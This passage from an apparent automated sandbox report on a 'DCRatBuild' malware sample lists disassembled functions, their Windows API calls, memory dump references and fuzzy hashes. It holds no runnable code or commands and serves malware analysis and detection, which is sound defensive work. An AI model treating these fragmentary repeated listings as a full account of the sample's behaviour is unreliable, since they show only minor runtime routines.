                                                                                                                        • Opcode Fuzzy Hash: 024e760c9ecc6ec41ed25fefdeb70935757b9cb1e6b7981c4800ba6b974d0ca7
                                                                                                                        • Instruction Fuzzy Hash: 92E0D833B05185A7CF098BB59C05CEB73DDEA65209B148176E403D7611F938DE414764
                                                                                                                        Function 0049A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A501
                                                                                                                          • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A532
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2673547680-0
                                                                                                                        • Opcode ID: 4ecfa755f2a56b8c94f809511cd808fc3ba18c5eea42bc5d4481c85b05fef9f4
                                                                                                                        • Instruction ID: 7da4567336add40eae5a5d3aa86f46fbcb82a6671330c1e55f07fd901b71c1fe
                                                                                                                        • Opcode Fuzzy Hash: 4ecfa755f2a56b8c94f809511cd808fc3ba18c5eea42bc5d4481c85b05fef9f4
                                                                                                                        • Instruction Fuzzy Hash: 7DF0A032240109BBDF016F61DC01FDA3B6CBB04385F448062B844D5164DB35DA94DA58
                                                                                                                        Function 0049A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(000000FF,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641,000000FF), ref: 0049A1F1
                                                                                                                          • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
                                                                                                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641), ref: 0049A21F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2643169976-0
                                                                                                                        • Opcode ID: 49f23e063879bee95ffacd23e43bde716b07361610a80478f63b662609de3efc
                                                                                                                        • Instruction ID: 66091b323e0e795bc69dbd42893ba5731c6ae243a86ac3b7dd31863498171b15
                                                                                                                        • Opcode Fuzzy Hash: 49f23e063879bee95ffacd23e43bde716b07361610a80478f63b662609de3efc
                                                                                                                        • Instruction Fuzzy Hash: AAE092321402096BDF019F62DC45FEA3B5CBB0C38AF484076B944D2154EB66DE94DAA8
                                                                                                                        Function 004AAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,004C2641,000000FF), ref: 004AACB0
                                                                                                                        • CoUninitialize.COMBASE(?,?,?,?,004C2641,000000FF), ref: 004AACB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GdiplusShutdownUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3856339756-0
                                                                                                                        • Opcode ID: fbe7a9f2470ba65ff6e79389e639eca093d199e517ed034cb898d00979c395a9
                                                                                                                        • Instruction ID: 72ac3c446e45f4765a5aaeb99d28902154658852e1ac5b12d096822c5ae113ba
                                                                                                                        • Opcode Fuzzy Hash: fbe7a9f2470ba65ff6e79389e639eca093d199e517ed034cb898d00979c395a9
                                                                                                                        • Instruction Fuzzy Hash: FFE06572644650EFCB00DF5DDD06F45FBA8FB49B20F10426AF416D3760CB746800CA98
                                                                                                                        Function 0049A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,0049A23A,?,0049755C,?,?,?,?), ref: 0049A254
                                                                                                                          • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0049A23A,?,0049755C,?,?,?,?), ref: 0049A280
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2673547680-0
                                                                                                                        • Opcode ID: bd8ec688106cc5188839124bd0a069fbff5db453cd290425fc4ca81d77df0d62
                                                                                                                        • Instruction ID: 92f41b8eb0c42ab3150cf43ac24927b6c4c104bf36d6dffec1455aad79afd220
                                                                                                                        • Opcode Fuzzy Hash: bd8ec688106cc5188839124bd0a069fbff5db453cd290425fc4ca81d77df0d62
                                                                                                                        • Instruction Fuzzy Hash: E6E092325001246BCF50AB69DC05BD97B58AB193E6F0442B2FD54E3294D774DE44CAE9
                                                                                                                        Function 004ADEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 004ADEEC
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • SetDlgItemTextW.USER32(00000065,?), ref: 004ADF03
                                                                                                                          • Part of subcall function 004AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004AB579
                                                                                                                          • Part of subcall function 004AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB58A
                                                                                                                          • Part of subcall function 004AB568: IsDialogMessageW.USER32(00010422,?), ref: 004AB59E
                                                                                                                          • Part of subcall function 004AB568: TranslateMessage.USER32(?), ref: 004AB5AC
                                                                                                                          • Part of subcall function 004AB568: DispatchMessageW.USER32(?), ref: 004AB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2718869927-0
                                                                                                                        • Opcode ID: 410811a6446bb9162142bdf25498c1426c51be711ef6ea674cb5b9cc92c1cb5d
                                                                                                                        • Instruction ID: 3a86a99ce39ccded516fc5eddc88705397ddf5bf9efec9cff10bcbec7ecb2f42
                                                                                                                        • Opcode Fuzzy Hash: 410811a6446bb9162142bdf25498c1426c51be711ef6ea674cb5b9cc92c1cb5d
                                                                                                                        • Instruction Fuzzy Hash: 01E09B7140024836DF01AB62DC0AFAE3B6C5B15789F44046BB204D60A3EA7DDA108669
                                                                                                                        Function 004A081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004A0836
                                                                                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0049F2D8,Crypt32.dll,00000000,0049F35C,?,?,0049F33E,?,?,?), ref: 004A0858
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1175261203-0
                                                                                                                        • Opcode ID: 78a8e66b10ed74809f63858659f6c81da2c399d7ab82d3b1482a16c83d955b8d
                                                                                                                        • Instruction ID: 980843a91721c037fb59c0f2af8d88ae1236e2a97f4c37d5f84624d76595fd34
                                                                                                                        • Opcode Fuzzy Hash: 78a8e66b10ed74809f63858659f6c81da2c399d7ab82d3b1482a16c83d955b8d
                                                                                                                        • Instruction Fuzzy Hash: C0E012764001186ADB11AB969C05FDA7BACEF0D392F04407A7645D2104D678DA848AB8
                                                                                                                        Function 004AA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004AA3DA
                                                                                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 004AA3E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BitmapCreateFromGdipStream
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1918208029-0
                                                                                                                        • Opcode ID: 30a80a0e9f626ac4cca01e74eee7bc4404326b1541f45873b3644a386dcf5d58
                                                                                                                        • Instruction ID: f98f26f74c1d697cfa5532629245b57f3e6aff5050d6640115428a1d29e8298b
                                                                                                                        • Opcode Fuzzy Hash: 30a80a0e9f626ac4cca01e74eee7bc4404326b1541f45873b3644a386dcf5d58
                                                                                                                        • Instruction Fuzzy Hash: 69E0ED71501218EBCB60DF56C545B99BBF8EB15364F10C05FA85697201E378AE04DBA5
                                                                                                                        Function 004B2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004B2BAA
                                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004B2BB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1660781231-0
                                                                                                                        • Opcode ID: e8337b5ea596dace2d24cbbf68d4dcaef551ec861eedd2dc0108eb658cdc64e5
                                                                                                                        • Instruction ID: d8e0adbb86829a34824567f9136ec0686e0ff4d88a29ad7e9f659909d76c0475
                                                                                                                        • Opcode Fuzzy Hash: e8337b5ea596dace2d24cbbf68d4dcaef551ec861eedd2dc0108eb658cdc64e5
                                                                                                                        • Instruction Fuzzy Hash: 85D0A73515C204284C142E732B0B5D52745DD427797B0029FE020955C1DEDCB241603D
                                                                                                                        Function 004912F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3351165006-0
                                                                                                                        • Opcode ID: d606821fcd5b24af777ef7acff3c5bbfe3b2795dd257ae0fcd2c18a191c789ff
                                                                                                                        • Instruction ID: 38507aa4bce7759b209deb065d0b2e24d959bf4ce3325fbd2b9cff40bb41cacc
                                                                                                                        • Opcode Fuzzy Hash: d606821fcd5b24af777ef7acff3c5bbfe3b2795dd257ae0fcd2c18a191c789ff
                                                                                                                        • Instruction Fuzzy Hash: 1BC0123205C200BECB010FB4DD09C3BBBA8ABA5312F04C928B0A5C0060C238C920DB11
                                                                                                                        Function 00491A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: e958ce177d2911b3f235ba2d37dc50091414d56885b1803506dbda40529ef060
                                                                                                                        • Instruction ID: b470929f57b928bd9e7da2d64547c87eb2db81534653e5f29aeb857eaad70d1f
                                                                                                                        • Opcode Fuzzy Hash: e958ce177d2911b3f235ba2d37dc50091414d56885b1803506dbda40529ef060
                                                                                                                        • Instruction Fuzzy Hash: D4C1D770A002569FEF15CF24C484BAA7FA6EF55310F0801BFDC469B3A6DB38A944CB65
                                                                                                                        Function 00493BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: bd559672166abb9393736e3ada456d1525cbc7eeee186b31a65d18e2dbcb2439
                                                                                                                        • Instruction ID: cc1a16d98a56a6ef7464ac1c5c4a778c40a53508cb2cd53d92783100954775ed
                                                                                                                        • Opcode Fuzzy Hash: bd559672166abb9393736e3ada456d1525cbc7eeee186b31a65d18e2dbcb2439
                                                                                                                        • Instruction Fuzzy Hash: 5471D071500B449EDF31DF70C855AE7BBE9AB16306F00093FE6AB83241DA3A6A44CF15
                                                                                                                        Function 00498284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00498289
                                                                                                                          • Part of subcall function 004913DC: __EH_prolog.LIBCMT ref: 004913E1
                                                                                                                          • Part of subcall function 0049A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0049A598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$CloseFind
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2506663941-0
                                                                                                                        • Opcode ID: ba768ced15235be8d1c7e8bd7a5405b3fed23275a913d353758d54bd85ffc0b9
                                                                                                                        • Instruction ID: 6dd5f357108c098e7ab4228c5c63ceda8c98ab4d4cd37c087303e6c150459f4d
                                                                                                                        • Opcode Fuzzy Hash: ba768ced15235be8d1c7e8bd7a5405b3fed23275a913d353758d54bd85ffc0b9
                                                                                                                        • Instruction Fuzzy Hash: 9841E6719442189ADF30DB65CC55AEABBB8AF11308F0400FFE48A97193EB795EC4CB14
                                                                                                                        Function 004913E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004913E1
                                                                                                                          • Part of subcall function 00495E37: __EH_prolog.LIBCMT ref: 00495E3C
                                                                                                                          • Part of subcall function 0049CE40: __EH_prolog.LIBCMT ref: 0049CE45
                                                                                                                          • Part of subcall function 0049B505: __EH_prolog.LIBCMT ref: 0049B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: ef7cef380f4bf34a0ea106cd778a54d10855f478b94c8a9a168a979f66a34218
                                                                                                                        • Instruction ID: e8831d87871a08b0adc8753cb9b4c4cf73e53b71ceb6354d5aa7b737a2772534
                                                                                                                        • Opcode Fuzzy Hash: ef7cef380f4bf34a0ea106cd778a54d10855f478b94c8a9a168a979f66a34218
                                                                                                                        • Instruction Fuzzy Hash: 2E416AB0905B419EE724CF7A8885AE6FAE5BB19314F50493FE5FE83282C7352654CB14
                                                                                                                        Function 004913DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004913E1
                                                                                                                          • Part of subcall function 00495E37: __EH_prolog.LIBCMT ref: 00495E3C
                                                                                                                          • Part of subcall function 0049CE40: __EH_prolog.LIBCMT ref: 0049CE45
                                                                                                                          • Part of subcall function 0049B505: __EH_prolog.LIBCMT ref: 0049B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 6129e99c6343a4ebb274e8ad1a09ec571e850130d9aa3b0d4c48e208fa07ebc5
                                                                                                                        • Instruction ID: 16a2109e2f6277054fafc9844dd6edd649cdf14bd141545886564d0b23ec426a
                                                                                                                        • Opcode Fuzzy Hash: 6129e99c6343a4ebb274e8ad1a09ec571e850130d9aa3b0d4c48e208fa07ebc5
                                                                                                                        • Instruction Fuzzy Hash: 2C4149B0905B409EE724DF7A8885AE6FAE5BB19314F50492F95FE83281C7352654CB14
                                                                                                                        Function 004AB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
